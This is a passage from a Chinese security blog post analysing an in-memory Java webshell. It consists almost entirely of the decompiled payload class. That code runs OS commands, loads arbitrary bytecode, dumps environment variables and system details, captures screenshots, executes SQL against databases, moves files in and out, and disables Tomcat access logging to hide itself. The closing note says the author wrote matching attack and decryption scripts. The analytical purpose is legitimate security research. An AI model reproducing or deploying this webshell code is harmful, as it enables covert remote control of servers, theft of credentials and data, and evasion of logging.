从零开始的内存马分析——如何骑马反杀(文末抽奖)(二)下(2)

举报
亿人安全 发表于 2023/05/21 14:41:04 2023/05/21
【摘要】 var5.append(var6.getMessage()); return var5.toString().getBytes(); } } else { return "No parameter srcFileName,destFileName".getBytes(); ...
                var5.append(var6.getMessage());                return var5.toString().getBytes();
            }
        } else {            return "No parameter srcFileName,destFileName".getBytes();
        }
    }    public byte[] copyFile() {        String var1 = this.get("srcFileName");        String var2 = this.get("destFileName");        if (var1 != null && var2 != null) {
            File var3 = new File(var1);
            File var4 = new File(var2);            try {                if (var3.exists() && var3.isFile()) {
                    FileInputStream var5 = new FileInputStream(var3);
                    FileOutputStream var6 = new FileOutputStream(var4);
                    byte[] var7 = new byte[5120];                    int var8;                    while((var8 = var5.read(var7)) > -1) {
                        var6.write(var7, 0, var8);
                    }

                    var5.close();
                    var6.close();                    return "ok".getBytes();
                } else {                    return "The target does not exist or is not a file".getBytes();
                }
            } catch (Exception var9) {                return var9.getMessage().getBytes();
            }
        } else {            return "No parameter srcFileName,destFileName".getBytes();
        }
    }    public byte[] include() {
        byte[] var1 = this.getByteArray("binCode");        String var2 = this.get("codeName");        if (var1 != null && var2 != null) {            try {
                CollectorBase var3 = new CollectorBase(this.getClass().getClassLoader());                Class var4 = var3.defineClass(var1);                this.session.put(var2, var4);                return "ok".getBytes();
            } catch (Exception var5) {                return this.session.get(var2) != null ? "ok".getBytes() : var5.getMessage().getBytes();
            }
        } else {            return "No parameter binCode,codeName".getBytes();
        }
    }    public byte[] execCommand() {        String var1 = this.get("argsCount");        if (var1 != null && var1.length() > 0) {            int var2 = Integer.parseInt(var1);            String[] var3 = new String[var2];            for(int var4 = 0; var4 < var3.length; ++var4) {
                var3[var4] = this.get("arg-" + var4);
            }            try {
                Process var11 = Runtime.getRuntime().exec(var3);                if (var11 == null) {                    return "Unable to start process".getBytes();
                } else {
                    InputStream var12 = var11.getInputStream();
                    InputStream var6 = var11.getErrorStream();
                    ByteArrayOutputStream var7 = new ByteArrayOutputStream(1024);
                    byte[] var8 = new byte[1042];                    int var9;                    if (var12 != null) {                        while((var9 = var12.read(var8)) > 0) {
                            var7.write(var8, 0, var9);
                        }
                    }                    if (var6 != null) {                        while((var9 = var6.read(var8)) > 0) {
                            var7.write(var8, 0, var9);
                        }
                    }                    return var7.toByteArray();
                }
            } catch (Exception var10) {
                StringBuffer var5 = new StringBuffer();
                var5.append("Exception errMsg:");
                var5.append(var10.getMessage());                return var5.toString().getBytes();
            }
        } else {            return "No parameter argsCount".getBytes();
        }
    }    public byte[] getBasicsInfo() {        String var1 = "";        try {
            Enumeration var2 = System.getProperties().keys();
            var1 = var1 + "FileRoot : " + this.listFileRoot() + "\n";
            var1 = var1 + "CurrentDir : " + (new File("")).getAbsoluteFile() + "/" + "\n";
            var1 = var1 + "CurrentUser : " + System.getProperty("user.name") + "\n";
            var1 = var1 + "ProcessArch : " + System.getProperty("sun.arch.data.model") + "\n";            String var9;            try {
                var9 = System.getProperty("java.io.tmpdir");
                char var4 = var9.charAt(var9.length() - 1);                if (var4 != '\\' && var4 != '/') {
                    var9 = var9 + File.separator;
                }

                var1 = var1 + "TempDirectory : " + var9 + "\n";
            } catch (Exception var7) {
            }

            var1 = var1 + "RealFile : " + this.getRealPath() + "\n";            try {
                var1 = var1 + "OsInfo : os.name: " + System.getProperty("os.name") + " os.version: " + System.getProperty("os.version") + " os.arch: " + System.getProperty("os.arch") + "\n";
            } catch (Exception var6) {
                var1 = var1 + "OsInfo : " + var6.getMessage() + "\n";
            }            for(var1 = var1 + "IPList : " + getLocalIPList() + "\n"; var2.hasMoreElements(); var1 = var1 + var9 + " : " + System.getProperty(var9) + "\n") {
                var9 = (String)var2.nextElement();
            }

            Map var11 = this.getEnv();            String var10;            if (var11 != null) {                for(Iterator var5 = var11.keySet().iterator(); var5.hasNext(); var1 = var1 + var10 + " : " + var11.get(var10) + "\n") {
                    var10 = (String)var5.next();
                }
            }            return var1.getBytes();
        } catch (Exception var8) {
            StringBuffer var3 = new StringBuffer();
            var3.append(var1);
            var3.append("Exception errMsg:");
            var3.append(var8.getMessage());            return var3.toString().getBytes();
        }
    }    public byte[] screen() {        try {
            Robot var1 = new Robot();
            BufferedImage var6 = var1.createScreenCapture(new Rectangle(Toolkit.getDefaultToolkit().getScreenSize().width, Toolkit.getDefaultToolkit().getScreenSize().height));
            ByteArrayOutputStream var3 = new ByteArrayOutputStream();
            ImageIO.write(var6, "png", ImageIO.createImageOutputStream(var3));
            byte[] var4 = var3.toByteArray();
            var3.close();            return var4;
        } catch (Throwable var5) {
            StringBuffer var2 = new StringBuffer();
            var2.append("Exception errMsg:");
            var2.append(var5.getMessage());            return var2.toString().getBytes();
        }
    }    public byte[] execSql() throws Exception {        String var1 = this.get("dbCharset");        String var2 = this.get("jdbcURL");        String var3 = this.get("dbDriver");        String var4 = this.get("dbUsername");        String var5 = this.get("dbPassword");        String var6 = this.get("execType");        if (var1 == null || var1.trim().length() > 0) {
            var1 = "UTF-8";
        }        String var7 = new String(this.getByteArray("execSql"), var1);
        HashMap var8 = new HashMap();        if (var4 != null && var5 != null && var6 != null && var7 != null) {            try {                try {                    if (var3 != null) {                        Class.forName(var3);
                    }
                } catch (Throwable var30) {
                }                try {                    Class.forName("com.microsoft.sqlserver.jdbc.SQLServerDriver");
                } catch (Throwable var29) {
                }                try {                    Class.forName("oracle.jdbc.driver.OracleDriver");
                } catch (Throwable var28) {                    try {                        Class.forName("oracle.jdbc.OracleDriver");
                    } catch (Throwable var27) {
                    }
                }                try {                    Class.forName("com.mysql.cj.jdbc.Driver");
                } catch (Throwable var26) {                    try {                        Class.forName("com.mysql.jdbc.Driver");
                    } catch (Throwable var25) {
                    }
                }                try {                    Class.forName("org.postgresql.Driver");
                } catch (Throwable var24) {
                }                if (var2 != null) {                    try {
                        Connection var9 = null;                        try {
                            var9 = getConnection(var2, var4, var5);
                        } catch (Exception var23) {
                        }                        if (var9 == null) {
                            var9 = DriverManager.getConnection(var2, var4, var5);
                        }

                        Statement var10 = var9.createStatement();                        if (var6.equals("select")) {
                            ResultSet var11 = var10.executeQuery(var7);
                            ResultSetMetaData var12 = var11.getMetaData();                            int var13 = var12.getColumnCount();
                            HashMap var14 = new HashMap();                            for(int var15 = 0; var15 < var13; ++var15) {
                                var14.put(String.valueOf(var15), var12.getColumnName(var15 + 1));
                            }

                            var14.put("count", String.valueOf(var13));
                            var8.put("column", var14);
                            HashMap var34 = new HashMap();                            int var16 = 0;                            for(int var17 = 0; var11.next(); ++var17) {
                                HashMap var18 = new HashMap();                                for(int var19 = 0; var19 < var13; ++var19) {                                    Object var20 = var11.getObject(var19 + 1);                                    String var21 = null;                                    if (var20 == null) {
                                        var21 = "NULL";
                                    } else {                                        Class var10000 = class$2;                                        if (var10000 == null) {                                            try {
                                                var10000 = Class.forName("[B");
                                            } catch (ClassNotFoundException var22) {                                                throw new NoClassDefFoundError(var22.getMessage());
                                            }                                            class$2 = var10000;
                                        }                                        if (var10000.isInstance(var20)) {
                                            var21 = this.base64Encode((byte[])var20);
                                        } else {
                                            var21 = var20.toString();
                                        }
                                    }

                                    var18.put(String.valueOf(var19), var21);
                                }

                                ++var16;
                                var34.put(String.valueOf(var17), var18);
                            }

                            var34.put("count", String.valueOf(var16));
                            var8.put("rows", var34);
                            var11.close();
                            var10.close();
                            var9.close();
                        } else {                            int var33 = var10.executeUpdate(var7);
                            var10.close();
                            var9.close();
                            var8.put("errMsg", "Query OK, " + var33 + " rows affected");
                        }
                    } catch (Exception var31) {
                        var8.put("errMsg", var31.getMessage());
                    }
                } else {
                    var8.put("errMsg", "This database is not supported");
                }
            } catch (Exception var32) {
                var8.put("errMsg", var32.getMessage());
            }
        } else {
            var8.put("errMsg", "No parameter dbType,dbHost,dbPort,dbUsername,dbPassword,execType,execSql");
        }        return this.serialize(var8);
    }    public byte[] close() {        try {            String var1 = this.sessionId();            String var2 = this.get("operation");            if (var1 != null) {
                Map var7 = (Map)sessionMap.remove(var1);
                var7.put("alive", Boolean.FALSE);                return "ok".getBytes();
            } else if (var2 != null && "clearup".equals(var2)) {                Iterator var3 = sessionMap.values().iterator();                while(var3.hasNext()) {                    Object var4 = var3.next();                    Class var10000 = class$0;                    if (var10000 == null) {                        try {
                            var10000 = Class.forName("java.util.Map");
                        } catch (ClassNotFoundException var5) {                            throw new NoClassDefFoundError(var5.getMessage());
                        }                        class$0 = var10000;
                    }                    if (var10000.isInstance(var4)) {
                        ((Map)var4).put("alive", Boolean.FALSE);
                    }
                }

                sessionMap.clear();                return "ok".getBytes();
            } else {                return "fail".getBytes();
            }
        } catch (Exception var6) {            return var6.getMessage().getBytes();
        }
    }    public byte[] bigFileUpload() {        String var1 = this.get("fileName");
        byte[] var2 = this.getByteArray("fileContents");        String var3 = this.get("position");        String var4 = "mem://";        int var5 = var3 == null ? 0 : Integer.parseInt(var3);
        Constructor var6 = null;        try {            try {                Class var10000 = class$8;                if (var10000 == null) {                    try {
                        var10000 = Class.forName("java.io.RandomAccessFile");
                    } catch (ClassNotFoundException var11) {                        throw new NoClassDefFoundError(var11.getMessage());
                    }                    class$8 = var10000;
                }                Class[] var10001 = new Class[2];                Class var10004 = class$3;                if (var10004 == null) {                    try {
                        var10004 = Class.forName("java.lang.String");
                    } catch (ClassNotFoundException var10) {                        throw new NoClassDefFoundError(var10.getMessage());
                    }                    class$3 = var10004;
                }                var10001[0] = var10004;                var10004 = class$3;                if (var10004 == null) {                    try {
                        var10004 = Class.forName("java.lang.String");
                    } catch (ClassNotFoundException var9) {                        throw new NoClassDefFoundError(var9.getMessage());
                    }                    class$3 = var10004;
                }                var10001[1] = var10004;                var6 = var10000.getConstructor(var10001);
            } catch (NoSuchMethodException var12) {
                var3 = null;
            }            if (var1.startsWith(var4)) {                if (var5 == 0) {
                    this.session.put(var1, new ByteArrayOutputStream());
                }

                ByteArrayOutputStream var7 = (ByteArrayOutputStream)this.session.get(var1);
                var7.write(var2);
            } else if (var3 == null) {
                FileOutputStream var14 = new FileOutputStream(var1, true);
                var14.write(var2);
                var14.flush();
                var14.close();
            } else {
                RandomAccessFile var15 = (RandomAccessFile)var6.newInstance(var1, "rw");
                var15.seek((long)var5);
                var15.write(var2);
                var15.close();
            }            return "ok".getBytes();
        } catch (Exception var13) {
            StringBuffer var8 = new StringBuffer();
            var8.append("Exception errMsg:");
            var8.append(var13.getMessage());            return var8.toString().getBytes();
        }
    }    public byte[] bigFileDownload() {        String var1 = this.get("fileName");        String var2 = this.get("mode");        String var3 = this.get("readByteNum");        String var4 = this.get("position");        String var5 = "mem://";        try {            if ("fileSize".equals(var2)) {                return String.valueOf((new File(var1)).length()).getBytes();
            } else if ("read".equals(var2)) {                int var6 = Integer.valueOf(var4);                int var12 = Integer.valueOf(var3);
                byte[] var8 = new byte[var12];                Object var9 = null;                if (var1.startsWith(var5)) {
                    var9 = (InputStream)this.session.get(var1);
                } else {
                    var9 = new FileInputStream(var1);
                }

                ((InputStream)var9).skip((long)var6);                int var10 = ((InputStream)var9).read(var8);
                ((InputStream)var9).close();                return var10 == var8.length ? var8 : copyOf(var8, var10);
            } else {                return "no mode".getBytes();
            }
        } catch (Exception var11) {
            StringBuffer var7 = new StringBuffer();
            var7.append("Exception errMsg:");
            var7.append(var11.getMessage());            return var7.toString().getBytes();
        }
    }    public static byte[] copyOf(byte[] var0, int var1) {
        byte[] var2 = new byte[var1];
        System.arraycopy(var0, 0, var2, 0, Math.min(var0.length, var1));        return var2;
    }    public Map getEnv() {        try {            Class var10000 = class$9;            if (var10000 == null) {                try {
                    var10000 = Class.forName("java.lang.System");
                } catch (ClassNotFoundException var1) {                    throw new NoClassDefFoundError(var1.getMessage());
                }                class$9 = var10000;
            }            return (Map)var10000.getMethod("getenv").invoke((Object)null);
        } catch (Throwable var2) {            return null;
        }
    }    public static Connection getConnection(String var0, String var1, String var2) {
        Connection var3 = null;        try {            Class var10000 = class$10;            if (var10000 == null) {                try {
                    var10000 = Class.forName("java.sql.DriverManager");
                } catch (ClassNotFoundException var15) {                    throw new NoClassDefFoundError(var15.getMessage());
                }                class$10 = var10000;
            }            Field[] var4 = var10000.getDeclaredFields();            Field var5 = null;            for(int var6 = 0; var6 < var4.length; ++var6) {
                var5 = var4[var6];                if (var5.getName().indexOf("rivers") != -1) {
                    var10000 = class$11;                    if (var10000 == null) {                        try {
                            var10000 = Class.forName("java.util.List");
                        } catch (ClassNotFoundException var14) {                            throw new NoClassDefFoundError(var14.getMessage());
                        }                        class$11 = var10000;
                    }                    if (var10000.isAssignableFrom(var5.getType())) {                        break;
                    }
                }

                var5 = null;
            }            if (var5 != null) {
                var5.setAccessible(true);                List var18 = (List)var5.get((Object)null);                Iterator var7 = var18.iterator();                while(var7.hasNext() && var3 == null) {                    try {                        Object var8 = var7.next();
                        Driver var9 = null;
                        var10000 = class$12;                        if (var10000 == null) {                            try {
                                var10000 = Class.forName("java.sql.Driver");
                            } catch (ClassNotFoundException var13) {                                throw new NoClassDefFoundError(var13.getMessage());
                            }                            class$12 = var10000;
                        }                        if (!var10000.isAssignableFrom(var8.getClass())) {
                            Field[] var10 = var8.getClass().getDeclaredFields();                            for(int var11 = 0; var11 < var10.length; ++var11) {
                                var10000 = class$12;                                if (var10000 == null) {                                    try {
                                        var10000 = Class.forName("java.sql.Driver");
                                    } catch (ClassNotFoundException var12) {                                        throw new NoClassDefFoundError(var12.getMessage());
                                    }                                    class$12 = var10000;
                                }                                if (var10000.isAssignableFrom(var10[var11].getType())) {
                                    var10[var11].setAccessible(true);
                                    var9 = (Driver)var10[var11].get(var8);                                    break;
                                }
                            }
                        }                        if (var9 != null) {
                            Properties var19 = new Properties();                            if (var1 != null) {
                                var19.put("user", var1);
                            }                            if (var2 != null) {
                                var19.put("password", var2);
                            }

                            var3 = var9.connect(var0, var19);
                        }
                    } catch (Exception var16) {
                    }
                }
            }
        } catch (Exception var17) {
        }        return var3;
    }    public String sessionId() {
        byte[] var1 = this.getByteArray("sessionId");        return var1 != null ? new String(var1) : null;
    }    public static String getLocalIPList() {
        ArrayList var0 = new ArrayList();        try {            Class var1 = Class.forName("java.net.NetworkInterface");            Method var2 = var1.getMethod("getNetworkInterfaces");            Method var3 = var1.getMethod("getInetAddresses");            Enumeration var4 = (Enumeration)var2.invoke((Object)null);            while(var4.hasMoreElements()) {                Object var5 = var4.nextElement();
                Enumeration var6 = (Enumeration)var3.invoke(var5);                while(var6.hasMoreElements()) {
                    InetAddress var7 = (InetAddress)var6.nextElement();                    if (var7 != null) {                        String var8 = var7.getHostAddress();
                        var0.add(var8);
                    }
                }
            }
        } catch (Throwable var9) {
        }        Iterator var10 = var0.iterator();
        StringBuffer var11 = new StringBuffer();
        var11.append("[");        while(var10.hasNext()) {            Object var12 = var10.next();
            var11.append(var12.toString());
            var11.append(",");
        }        if (var11.length() > 1) {
            var11.deleteCharAt(var11.length() - 1);
        }

        var11.append("]");        return var11.toString();
    }    public String getRealPath() {        String var1 = (new File("")).getAbsoluteFile() + "/";        if (this.servletRequest != null) {            try {
                Method var2 = this.getMethodByClass(this.servletRequest.getClass(), "getServletContext", new Class[0]);                Object var3 = var2.invoke(this.servletRequest, (Object[])null);                if (var3 != null) {                    Class var4 = var3.getClass();                    Class[] var5 = new Class[1];                    Class var10002 = class$3;                    if (var10002 == null) {                        try {
                            var10002 = Class.forName("java.lang.String");
                        } catch (ClassNotFoundException var8) {                            throw new NoClassDefFoundError(var8.getMessage());
                        }                        class$3 = var10002;
                    }                    var5[0] = var10002;                    Method var6 = this.getMethodByClass(var4, "getRealPath", var5);                    if (var6 != null) {                        Object var7 = var6.invoke(var3, "/");                        return var7 != null ? var7.toString() : var1;
                    }
                }
            } catch (Throwable var9) {
            }
        }        return var1;
    }    public void deleteFiles(File var1) throws Exception {        if (var1.isDirectory()) {
            File[] var2 = var1.listFiles();            for(int var3 = 0; var3 < var2.length; ++var3) {
                File var4 = var2[var3];
                this.deleteFiles(var4);
            }
        }

        var1.delete();
    }    Object invoke(Object var1, String var2, Object[] var3) {        try {
            ArrayList var4 = new ArrayList();            if (var3 != null) {                for(int var5 = 0; var5 < var3.length; ++var5) {                    Object var6 = var3[var5];                    if (var6 != null) {
                        var4.add(var6.getClass());
                    } else {
                        var4.add((Object)null);
                    }
                }
            }

            Method var8 = this.getMethodByClass(var1.getClass(), var2, (Class[])var4.toArray(new Class[0]));            return var8.invoke(var1, var3);
        } catch (Exception var7) {            return null;
        }
    }

    Method getMethodByClass(Class var1, String var2, Class[] var3) {
        Method var4 = null;        while(var1 != null) {            try {
                var4 = var1.getDeclaredMethod(var2, var3);
                var1 = null;
            } catch (Exception var5) {
                var1 = var1.getSuperclass();
            }
        }        return var4;
    }    public static Object getFieldValue(Object var0, String var1) throws Exception {
        Field var2 = null;        if (var0 instanceof Field) {
            var2 = (Field)var0;
        } else {            Class var3 = var0.getClass();            while(var3 != null) {                try {
                    var2 = var3.getDeclaredField(var1);
                    var3 = null;
                } catch (Exception var4) {
                    var3 = var3.getSuperclass();
                }
            }
        }

        var2.setAccessible(true);        return var2.get(var0);
    }    private byte[] readInputStream(InputStream var1, int var2) {
        byte[] var3 = new byte[var2];        int var4 = 0;        try {            while((var4 += var1.read(var3, var4, var3.length - var4)) < var3.length) {
            }
        } catch (IOException var5) {
        }        return var3;
    }    public static String getRandomString(int var0) {        String var1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
        Random var2 = new Random();
        StringBuffer var3 = new StringBuffer();
        var3.append(var1.charAt(var2.nextInt(52)));
        var1 = var1 + "0123456789";        for(int var4 = 0; var4 < var0; ++var4) {            int var5 = var2.nextInt(62);
            var3.append(var1.charAt(var5));
        }        return var3.toString();
    }    private void noLog(Object var1) {        try {
            Method var2 = this.getMethodByClass(var1.getClass(), "getServletContext", (Class[])null);            Object var3 = var2.invoke(var1, (Object[])null);            Object var4 = getFieldValue(var3, "context");            Object var5 = getFieldValue(var4, "context");            ArrayList var6;            for(var6 = new ArrayList(); var5 != null; var5 = this.invoke(var5, "getParent", (Object[])null)) {
                var6.add(var5);
            }

            label84:            for(int var7 = 0; var7 < var6.size(); ++var7) {                try {                    Object var8 = this.invoke(var6.get(var7), "getPipeline", (Object[])null);                    if (var8 != null) {                        Object var9 = this.invoke(var8, "getFirst", (Object[])null);                        while(true) {                            while(true) {                                if (var9 == null) {                                    continue label84;
                                }                                if (this.getMethodByClass(var9.getClass(), "getCondition", (Class[])null) != null) {                                    Class var10001 = var9.getClass();                                    Class[] var10003 = new Class[1];                                    Class var10006 = class$3;                                    if (var10006 == null) {                                        try {
                                            var10006 = Class.forName("java.lang.String");
                                        } catch (ClassNotFoundException var14) {                                            throw new NoClassDefFoundError(var14.getMessage());
                                        }                                        class$3 = var10006;
                                    }                                    var10003[0] = var10006;                                    if (this.getMethodByClass(var10001, "setCondition", var10003) != null) {                                        String var10 = (String)this.invoke((String)var9, "getCondition", new Object[0]);
                                        var10 = var10 == null ? "FuckLog" : var10;
                                        this.invoke(var9, "setCondition", new Object[]{var10});
                                        var10001 = var1.getClass();
                                        var10003 = new Class[2];                                        var10006 = class$3;                                        if (var10006 == null) {                                            try {
                                                var10006 = Class.forName("java.lang.String");
                                            } catch (ClassNotFoundException var13) {                                                throw new NoClassDefFoundError(var13.getMessage());
                                            }                                            class$3 = var10006;
                                        }                                        var10003[0] = var10006;                                        var10006 = class$3;                                        if (var10006 == null) {                                            try {
                                                var10006 = Class.forName("java.lang.String");
                                            } catch (ClassNotFoundException var12) {                                                throw new NoClassDefFoundError(var12.getMessage());
                                            }                                            class$3 = var10006;
                                        }                                        var10003[1] = var10006;                                        Method var11 = this.getMethodByClass(var10001, "setAttribute", var10003);                                        var11.invoke(var10, var10);                                        var9 = this.invoke(var9, "getNext", (Object[])null);                                        continue;
                                    }
                                }                                if (Class.forName("org.apache.catalina.Valve", false, var4.getClass().getClassLoader()).isAssignableFrom(var9.getClass())) {
                                    var9 = this.invoke(var9, "getNext", (Object[])null);
                                } else {
                                    var9 = null;
                                }
                            }
                        }
                    }
                } catch (Exception var15) {
                }
            }
        } catch (Exception var16) {
        }

    }    public static int bytesToInt(byte[] var0) {        int var1 = var0[0] & 255 | (var0[1] & 255) << 8 | (var0[2] & 255) << 16 | (var0[3] & 255) << 24;        return var1;
    }    public static byte[] intToBytes(int var0) {
        byte[] var1 = new byte[]{(byte)(var0 & 255), (byte)(var0 >> 8 & 255), (byte)(var0 >> 16 & 255), (byte)(var0 >> 24 & 255)};        return var1;
    }    public String base64Encode(byte[] var1) {
        byte var2 = 0;        int var3 = var1.length;
        byte[] var4 = new byte[4 * ((var1.length + 2) / 3)];
        byte var5 = -1;        boolean var6 = true;
        char[] var7 = toBase64;        int var8 = var2;        int var9 = (var3 - var2) / 3 * 3;        int var10 = var2 + var9;        if (var5 > 0 && var9 > var5 / 4 * 3) {
            var9 = var5 / 4 * 3;
        }        int var11;        int var12;        int var13;        for(var11 = 0; var8 < var10; var8 = var12) {
            var12 = Math.min(var8 + var9, var10);
            var13 = var8;            int var15;            for(int var14 = var11; var13 < var12; var4[var14++] = (byte)var7[var15 & 63]) {
                var15 = (var1[var13++] & 255) << 16 | (var1[var13++] & 255) << 8 | var1[var13++] & 255;
                var4[var14++] = (byte)var7[var15 >>> 18 & 63];
                var4[var14++] = (byte)var7[var15 >>> 12 & 63];
                var4[var14++] = (byte)var7[var15 >>> 6 & 63];
            }

            var13 = (var12 - var8) / 3 * 4;
            var11 += var13;
        }        if (var8 < var3) {
            var12 = var1[var8++] & 255;
            var4[var11++] = (byte)var7[var12 >> 2];            if (var8 == var3) {
                var4[var11++] = (byte)var7[var12 << 4 & 63];                if (var6) {
                    var4[var11++] = 61;
                    var4[var11++] = 61;
                }
            } else {
                var13 = var1[var8++] & 255;
                var4[var11++] = (byte)var7[var12 << 4 & 63 | var13 >> 4];
                var4[var11++] = (byte)var7[var13 << 2 & 63];                if (var6) {
                    var4[var11++] = 61;
                }
            }
        }        return new String(var4);
    }
}

图片

到此,分析暂时完成,看情况分析WindowsConfig.jsp

图片

0x04 小结

本篇我们针对内存马,通过对流量的照猫画虎和照虎画猫,编写了通用的攻击脚本,以及解密脚本,欠缺的是仍然需要burp的辅助,后续会更新工具版

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。